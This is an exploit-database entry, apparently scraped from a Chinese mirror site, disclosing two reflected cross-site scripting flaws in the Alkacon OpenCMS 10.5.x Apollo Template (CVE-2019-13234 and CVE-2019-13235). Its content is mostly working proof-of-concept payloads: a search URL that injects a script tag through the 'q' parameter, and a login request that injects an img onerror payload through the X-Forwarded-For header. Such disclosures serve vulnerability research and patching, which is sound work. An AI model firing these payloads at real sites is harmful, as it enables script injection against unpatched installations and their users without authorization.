扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template # Google Dork: N/A # Date: 18/07/2019 # Exploit Author: Aetsu # Vendor Homepage: http://www.opencms.org # Software Link: https://github.com/alkacon/apollo-template # Version: 10.5.x # Tested on: 10.5.5 / 10.5.4 # CVE : CVE-2019-13234, CVE-2019-13235 1. Reflected XSS in the search engine: - Affected resource -> "q" POC: </code><code> https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax& </code><code> 2. Reflected XSS in login form: POC: The vulnerability appears when the header X-Forwarded-For is used as shown in the next request: </code><code> GET /login/index.html?requestedResource=&name=Editor&password=editor&action=login HTTP/1.1 Host: example.com X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja </code><code> Extended POCs: https://aetsu.github.io/OpenCms |
体验盒子
